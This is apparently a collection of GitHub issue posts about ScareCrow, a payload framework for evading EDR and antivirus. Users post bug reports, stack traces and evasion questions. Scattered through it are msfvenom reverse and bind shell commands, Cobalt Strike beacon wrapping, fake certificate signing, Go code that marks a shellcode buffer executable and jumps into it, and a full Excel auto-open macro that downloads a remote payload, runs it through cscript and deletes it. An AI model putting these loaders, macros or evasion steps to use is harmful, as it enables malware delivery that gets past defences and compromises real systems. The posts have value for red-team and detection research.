optiv / scarecrow
ScareCrow - Payload creation framework designed around EDR bypass.
Are you aware of the below?
https://github.com/mgeeky/ShellcodeFluctuation
It would be worth implementing into ScareCrow
ScareCrow_3.0_windows_amd64.exe -I c.bin -Loader binary -domain www.microsoft.com
After creating shellcode in Mythic using the Atlas agent, I try to generate a wrapper for it using the ScareCrow wrapper and am getting this:
No payloads that can be included have been created yet.
What am I doing wrong?
I followed the installation instructions and am running into issues where it thinks I am missing things. See below. Any advice?
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open Word/Word.go: no such file or directory
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open lync/lync.go: no such file or directory
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open Outlook/Outlook.go: no such file or directory
When I create a binary (on kali):
./ScareCrow -I shellcode_x64.bin -Loader binary -domain google.com
and execute the binary on windows, I receive an exception:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x1724fbb3000 0xc000090000
PC=0xc000090000
syscall.Syscall(0xc000090000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/OneDrive.go:202 +0x665
I would like to thank you for providing such a complete framework and the research details first!
Unfortunately, I was not able to create valid payloads with ScareCrow so far.
As an example, I tried the shellcode creation via msfvenom first:
msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'
or
msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 EXITFUNC=thread -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'
Then I tried to use ScareCrow on it:
./ScareCrow -I ../bind.bin -Loader binary -domain microsoft.com -console
which succeeds in creating a binary loader. But the resulting exe is not working on a Windows box. The resulting debug output in the console is:
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0xda29d2b000 0xc000128000
PC=0xc000128000
runtime: unknown pc 0xc000128000
I also tried to use Donut to create a x64 shellcode of an existing binary, as well as using dll as a Loader for ScareCrow for both generated shellcodes (msf and donut). Nothing worked so far for me.
Can you please give me more details on what kind of shellcode payload ScareCrow expects?
Maybe provide some examples in the documentation?
Many thanks
Hey man great work!
I would like to ask for a feature request when you find time and you want it as well :)
Feature: To add an output parameter that specifies the location of the final Payload/Loader on where it is going to be saved.
For example:
./ScareCrow ...... --output /home/user/Desktop/
(The user wants the final payload to be saved at the Desktop)
Thanks in advance,
Keep up the great work!
Tried as well with disabling amsi,etw and sleep.
Encrypted shellcode method does not bypass antiviruses.
When executing the HTA delivery file (for both control and excel loaders) passing a remote URL where the HTA file is hosted does nothing. On the other hand, if the HTA file is already located on disk, the shellcode is executed successfully.
Monitoring through Process Explorer for control, you can see that control.exe is spawned which then calls rundll32.exe. This never happens when a remote URL is passed instead.
HTA file generated via:
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader control -O loader.hta -delivery hta -url <url> -domain <domain>
OR
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader excel -O loader.hta -delivery hta -url <url> -domain <domain>
Control/Excel Loader executed via:
mshta.exe http://HOST/loader.hta
--> does not work
mshta.exe C:\Windows\Tasks\loader.hta
--> works
It'd be nice if there was a service binary option when building a payload that we can use with services.
Hello,
If I choose the delivery option (hta), the executable is generated, but the hta file and the one-liner command (output?) are missing.
What have I missed?
Thanks!
Whenever I try to generate a binary it fails. I peeked at the code and saw that it fails at the point where the certificate is generated. I have tried it on an up-to-date Kali Linux and on a Debian 9 server.
The payload is generated with:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.197 LPORT=51251 -f raw > bin.raw
Tried multiple argument permutations.
Error:
└─$ /opt/ScareCrow/ScareCrow -I /home/kali/Desktop/bin.raw -domain axano.com -Loader binary -delivery macro -url http://192.168.0.197/
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6df56a]
goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffe784ad450, 0x9)
/opt/ScareCrow/limelighter/limelighter.go:56 +0x2ca
ScareCrow/limelighter.Signer(0x7ffe784ad450, 0x9, 0x0, 0x0, 0x0, 0x0, 0xc000448720, 0x7)
/opt/ScareCrow/limelighter/limelighter.go:1040 +0x4c6
main.execute(0xc0000fa000, 0x76f099, 0x3)
/opt/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
/opt/ScareCrow/ScareCrow.go:162 +0x906
Hi, thanks for this awesome tool!
fixed thanks.
When run, it makes random files (onenote, onedrive, excel, word) but never creates the out file.
go build ScareCrow.go
/home/virginhybrid78/Downloads/ScareCrow-main/Struct/Struct.go:213: error: invalid export data for ‘Macro’: invalid line number
/home/virginhybrid78/Downloads/ScareCrow-main/Struct/Struct.go:212: error: invalid export data for ‘Macro’: invalid line number
Hi,
I generated shellcode for a message box and used the binary loader to convert it to an exe with ScareCrow.
It was generated successfully, but it's not prompting the message box. It seems there is an issue with the binary loader.
exec: "": executable file not found in %PATH%:
[+] Payload Compiled
[*] Signing mimosys.dll With a Fake Cert
2022/04/15 12:46:03 cmd.Run() failed with exit status 0xffffffff
I have downloaded osslsigncode and put it on the PATH env variable to sign, and it gives this error.
Does not work on Windows 10.
Binary and dll payloads are not working with Covenant (that uses donut to generate shellcode).
The control .cpl payload works but it is flagged by 6 AVs. I was modifying the code base for ages trying to find the signatures, but it's a large code base.
Any ideas which bits of the code they are flagging? I noticed that random names are generated for every function and variable name in the Cryptor.
I tried running the dll payload with: rundll32 example.dll
Hello,
thank you for providing such a great framework! Amazing work.
Unfortunately, the DLL Refresher code is detected by some AV, for example: NOD32. Example command:
../ScareCrow/ScareCrow -I beacon-sourcepoint-test1.bin -Loader dll -etw -domain www.microsoft.com
When I disabled refreshing and ETW, the DLL bypasses NOD32 though. I tried modifying the Struct.go, but editing is pretty hard due to "variable set and unused" compilation error.
Any chance that you can implement ETW and Refresher functionality as reflected (encrypted) DLL files? My Golang skills cannot do that in this language :(
thanks
Rafal
Hi again,
as I played around with this great tool a little more, I found I could not get the Excel loader module to work.
I tried to create shellcode in two ways:
msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -o msf.bin -f raw
msfvenom -p windows/x64/meterpreter_bind_tcp LPORT=8888 -o msf.bin -f raw
Both worked flawlessly with other loaders (except the binary one).
When I create the payload via Excel loader module, I try to execute it via cscript as I saw a JavaScript file gets created.
Excel spawns with an unsafe file extension message but does not execute the resulting xll.
I saw the xll got created in AppData\temp so I copied it before closing Excel and tried to execute the DLL manually by the methods described in this gist:
https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
Unfortunately none of them worked.
Windows version here is
Version 20H2 (OS Build 19042.746)
Excel version is:
Office Professional Plus 2019
Version 2102
No AVs are installed and Defender is turned off completely for testing here.
Input:
./ScareCrow -I /root/tools/b64.bin -Loader wscript -O loader.hta -domain microsoft.com
Thoughts:
Tested 3 times. File output only appears to show code from Structs.go JSfile() the code from HTA() does not appear in file. I could be using it wrong or something but I think the expected output would be using some of the HTA() code (at least for the html). Might help solve issue #19.
Interesting Output found during testing (file extension left blank):
C:\Users\Admin\Desktop>test.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0xffffffffffffffff 0x7ffcdc61d34d
PC=0x7ffcdc61d34d
runtime: unknown pc 0x7ffcdc61d34d
Hi,
Is it possible that the different Loaders and Delivery options don't work? I installed the dependencies and everything on Kali Linux and generated raw shellcode with msfvenom. The process of building a binary or dll finishes without errors, but they never execute the payload. I'm using a Windows x64 reverse shell generated with this command:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows -f raw -o shellcode.bin LHOST=192.168.0.49 LPORT=443
the command executed to build the binary is:
./ScareCrow -I /root/Desktop/tests/payloads/shellcode.bin -delivery bits -domain www.microsoft.com
The delivery options do not generate the code to download and execute the payload, like the macros one.
The only option that actually worked and executed the reverse shell was the Control Panel applet. Nothing else works.
Also, when I examine the Digital Signature of the generated binary or dll or applet it says that it cannot be verified, unlike the screenshot you provided in the Readme file.
My go version is 1.15.3
Any ideas as to what might be wrong? Do I need to start from zero?
Thank you!
Hi. Thank you for your great work! I am trying to get a Cobalt Strike beacon.exe thru Windows Defender but currently I get the two errors below. I attempt this on Kali 2021.3 in a virtual environment using version 2.3 of ScareCrow.
┌──(virtual_env_scarecrow)─(root💀kali)-[~/pentest/ScareCrow-2.3]
└─# ./ScareCrow -I beacon.exe -domain www.microsoft.com -injection "C:\Windows\System32\notepad.exe" -console
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Process Injection Mode Enabled
[*] Created Process: C:\Windows\System32\notepad.exe
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneDrive's Properties
[*] Compiling Payload
exit status 2: # loader
./OneDrive.go:367:67: newline in string
./OneDrive.go:367:67: syntax error: unexpected newline, expecting comma or )
./OneDrive.go:2682:3: newline in string
[+] Payload Compiled
[*] Signing OneDrive.exe With a Fake Cert
2021/09/22 04:06:42 cmd.Run() failed with exit status 255
For some reason macro fails! After generating loader and js file from msfvenom.bin shellcode
./ScareCrow -I msfvenom.bin -Loader excel
-domain some.tld -url http://some.com -sandbox -O file.js
Host the file on the server provided in the payload, copy the macro from ScareCrow and add it to Office 2013
Developer Macro! (As for the shellcode, it works: when I execute cscript file.js I get shell access)
From Process Hacker I can actually see Excel contact the server URL I provided, but no reverse shell is created! Tried with the excel, msiexec and wscript Loaders, so I am assuming that I have made a mistake somewhere!
can you please post the command to generate a macro?
i have tried ./Scarecrow -I my.bin -Loader excel -domain www.youtube.com -url https://file.io
should I add the binary name after file.io?
Thanks in advance
Payload is detected by defender as malicious and deleted
I created stageless meterpreter with msfvenom, then packed it as exe file with scarecrow, and windows defender is catching my exe file. Am I doing something wrong, or is ScareCrow already out of date?
Kind regards, Zahar
Hello!
I'm finding that Windows Defender is gobbling each and every payload I throw from ScareCrow at it, and it feels like I'm doing something wrong. Hope you could sanity check my process? Fair warning: I'm not new to pentesting but new to Cobalt Strike and not very experienced with EDR bypass techniques. In fact, seeing this video on ScareCrow is what inspired me to finally buy Cobalt Strike!
Anyways, I start in Cobalt Strike:
Attacks > Packages > Payload Generator > picked my listener > chose output of "raw" > ticked the box for "Use x64 payload" > saved that to ScareCrow folder on Kali VM. I also tried Attacks > Packages > Windows Executable (S) to get the export as well.
From Kali VM, tried generating a variety of payloads from Scarecrow. They generate successfully with no errors.
From my Win 10 19041 box, tried firing the payloads in several ways (drag and drop directly to disk, fire with msbuild, fire with PowerShell, fire with rundll32, etc.) and Windows Defender happily gobbles them up.
I thought maybe it was just Defender getting wise to some of ScareCrow's shenanigans, but it looks like folks have no problem fooling Defender - at least as of this very recent blog post that I saw someone tweet.
Any ideas?
Thanks!
Brian
Hello all, please: when I use the ssm run command I get the result as failed with this screen.
Failed to run command : exit status 0xffffffff
Hello,
During testing of C2 frameworks and scarecrow I ran across interesting behavior when it came to the Mythic C2 atlas agent (https://github.com/MythicAgents/atlas)
When exporting an atlas agent executable, using donut to generate shellcode and then using scarecrow the new wrapped payload is successfully created. When executed this payload makes 1 callback to the C2 server and then ceases to run. I have tried a number of different combinations to attempt to understand the issue better:
atlas + confuserEx + donut + scarecrow = 1 callback then dead
atlas + donut + scarecrow = 1 callback then dead
atlas + CLRvoyance + scarecrow = 1 callback then dead
atlas + confuserEx + donut + DonutTest = working implant
in addition I tried another dotnet c2 framework
Covenant Grunt + confuserEx + donut + scarecrow = working implant.
I have tried binary and control loaders and I have used the console and no errors are generated at any point. I'm happy to try and other troubleshooting that anyone might recommend.
Thanks
Windows Defender has a new sandbox now, not executing any script on the system.
Hello :)
Which EDR were you able to bypass ?
Best,
L
Thank you for the code and latest update, however, I could not generate exe on latest 4.0.
Raw payload generated by the latest CS
sudo ./ScareCrow -I ~/Downloads/beacon.bin -Loader control -domain www.microsoft.com -O test.exe
gives me the following error message:
[*] Compiling Payload
exit status 1: go list error: exit status 1: inputs.go:8:1: expected 'STRING', found '<<'
[+] Payload Compiled
Each time I run the command it pops a different file name, but the same location, for example:
exit status 1: go list error: exit status 1: winsec.go:8:1: expected 'STRING', found '<<'
exit status 1: go list error: exit status 1: netfirewall.go:8:1: expected 'STRING', found '<<'
Thanks!!
Hello, running this tool in a Windows 10 box, with all the required tools installed and set up on the PATH variable of the system, I get this error:
ccc is the raw payload generated with msfvenom
C:\temp\ScareCrow>ScareCrow.exe -I c:\temp\ccc -domain microsoft.com
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With Outlook's Properties
[*] Compiling Payload
exec: "": executable file not found in %PATH%:
[+] Payload Compiled
[*] Signing Outlook.exe With a Fake Cert
2021/02/15 16:29:44 cmd.Run() failed with exit status 4294967295
I cannot figure out which executable is not on the PATH. Is there anything I'm doing wrong? Every single tool is working and is on the PATH:
Thanks
How can I optimize the encryption to stay out of detection?
OS is Kali Linux 2021.2. Go version is go version go1.15.15 linux/amd64.
I'm using a Cobalt Strike payload generated using Attacks -> Packages -> Windows Executable (S), Raw, and checked x64.
I enter the command:
./ScareCrow -I payload.bin -Loader wscript -etw --url http://[redacted] -domain support.microsoft.com -delivery bits
I get the error:
2021/09/23 11:10:01 [-] Invalid PKCS7 Data (Empty or Not Padded)
I've tried different options and different domains and always get the same error. I also tried git pull origin main
and ran through the documented installation steps and still get the same error.
Thanks
Unable to find a resolution for this one. Any time I attempt to run using anything other than the default, I am presented with an error from go, I believe, relating to a previous declaration:
[*] Compiling Payload
exit status 1: go list error: exit status 2: # igYzBjFwiyh
./tcpmon.go:10:3: base64 redeclared as imported package name
/home/user/tools/ScareCrow/tcpmon/tcpmon.go:8:3: previous declaration
I didn't see this anywhere else, could it be a golang issue with the new version or something related to my current setup?
Thanks! And thank you for your work, it's fantastic.
After the step "[*] Signing Outlook.exe With a Fake Cert", I got cmd.Run() failed with exit status 0xffffffff.
my env:
go version go1.17.1 windows/amd64
OpenSSL 3.0.0 7 sep 2021 (Library: OpenSSL 3.0.0 7 sep 2021)
osslsigncode 2.2, using:
OpenSSL 1.1.1k 25 Mar 2021 (Library: OpenSSL 1.1.1k 25 Mar 2021)
libcurl/7.78.0 OpenSSL/1.1.1k zlib/1.2.11
Hi, there is some code I can't understand in this shellcode loader.
ScareCrow executes shellcode this way:

```go
// Uses golang.org/x/sys/windows, syscall and unsafe; shellcode is a []byte.
// Declare an empty function value whose storage is overwritten below.
targetPtr := func() {
}
size := uintptr(len(shellcode))
var old uint32
// Change the protection of the memory holding the function value.
windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)), size, windows.PAGE_EXECUTE_READWRITE, &old)
// Overwrite the function value's pointer so it points at the shellcode slice header.
*(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&shellcode))
var old1 uint32
// Make the shellcode bytes themselves executable.
windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])), size, windows.PAGE_EXECUTE_READWRITE, &old1)
// Call directly into the shellcode buffer (targetPtr is never invoked).
syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), 0, 0, 0, 0)
```
But I tried it, and this other way works too and has less code:

```go
size := uintptr(len(shellcode))
var old uint32
// Make the shellcode buffer executable, then jump straight into it.
windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])), size, windows.PAGE_EXECUTE_READWRITE, &old)
syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), 0, 0, 0, 0)
```
And another way works but is unreliable:

```go
targetPtr := func() {
}
size := uintptr(len(shellcode))
var old uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)), size, windows.PAGE_EXECUTE_READWRITE, &old)
// Same function-value overwrite as in the first snippet...
*(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&shellcode))
var old1 uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])), size, windows.PAGE_EXECUTE_READWRITE, &old1)
// ...but invoked through the overwritten function value instead of syscall.Syscall.
targetPtr()
```
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6b7193]
goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffee0ffe6d3, 0x8)
/home/jean/Documents/Tools/ScareCrow/limelighter/limelighter.go:49 +0x133
ScareCrow/limelighter.Signer(0x7ffee0ffe6d3, 0x8, 0x0, 0x0, 0x0, 0x0, 0xc000309100, 0x8)
/home/jean/Documents/Tools/ScareCrow/limelighter/limelighter.go:1015 +0x5de
main.execute(0xc000012120, 0x73f3a9, 0x4)
/home/jean/Documents/Tools/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
/home/jean/Documents/Tools/ScareCrow/ScareCrow.go:162 +0x90c
The first error seems to be an access denied (0xc0000005)
./ScareCrow -I ~/Desktop/Payloads/payload.bin -console -domain www.microsoft.com
Example one
OneDrive.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x1af93eea000 0xc00009c000
PC=0xc00009c000
syscall.Syscall(0xc00009c000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/OneDrive.go:202 +0x665
Example two - ran as administrator to see if the problem went away
cmd
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x196c2d26000 0xc000068000
PC=0xc000068000
syscall.Syscall(0xc000068000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/cmd.go:202 +0x658
This appears to have been raised in #7 but I am using the latest version (I believe - I don't see a version number in the output) cloned today (18/03)
Attempting to generate a macro payload but I am running into an error:
root@kali:/opt/ScareCrow# ./ScareCrow -I this.bin -Loader msiexec -domain www.microsoft.com -delivery macro -url http:///test.bin
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With apphelp's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing apphelp.dll With a Fake Cert
[+] Signed File Created
[*] Creating Loader
[*] Macro Delivery Payload
[!] Excel macro that will download, execute and remove the payload:
Sub Auto_Open()
Dim UghEc As String
Dim wxnKct As String
Dim MmWsYRd As String
UghEc = Environ("AppData") & "\Microsoft\Excel"
VBA.ChDir UghEc
Dim QssSvuJy As String
Dim nKgV As String
Dim gcxBaK As Object
QssSvuJy = "http://redacted"
nKgV = ""
Set gcxBaK = CreateObject("Microsoft.XMLHTTP")
gcxBaK.Open "GET", QssSvuJy, False
gcxBaK.send
If gcxBaK.Status = 200 Then
Set EMKAG = CreateObject("ADODB.Stream")
EMKAG.Open
EMKAG.Type = 1
EMKAG.Write gcxBaK.responseBody
EMKAG.SaveToFile nKgV, 2
EMKAG.Close
End If
wxnKct = UghEc & nKgV
Set AxJpqt = GetObject("new:0006F03A-0000-0000-C000-000000000046")
AxJpqt.CreateObject("WScript.Shell").Run("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & wxnKct), 0
vLokSZ
Kill wxnKct
End Sub
Sub vLokSZ()
Dim when As Variant
Debug.Print "Start " & Now
when = Now + TimeValue("00:00:30")
Do While when > Now
DoEvents
Loop
Debug.Print "End " & Now
End Sub
panic: open : no such file or directory
goroutine 1 [running]:
ScareCrow/Utils.check(...)
/opt/ScareCrow/Utils/Utils.go:27
ScareCrow/Utils.Writefile(0x0, 0x0, 0xc0020d8000, 0x2b0dc6)
/opt/ScareCrow/Utils/Utils.go:19 +0x145
ScareCrow/Loader.CompileLoader(0x7ffd34ebce04, 0x7, 0x0, 0x0, 0xc0000b22e0, 0xb, 0x781332, 0x7, 0x7ffd34ebce30, 0x5, ...)
/opt/ScareCrow/Loader/Loader.go:1010 +0x585
main.main()
/opt/ScareCrow/ScareCrow.go:193 +0xb1b
It looks like it's just getting cut off a bit soon or something.
When giving it a PKCS7 code-signing cert, it looks to be finishing up building and then I receive a cmd.Run() error.
[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With schannel's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing schannel.dll With a Valid Cert <file>.p7b
2022/02/25 11:57:49 cmd.Run() failed with exit status 255
Additionally, my network needs a proxy for it to create a fake cert based on domain. Can you include that as an option to use a proxy to create a fake cert?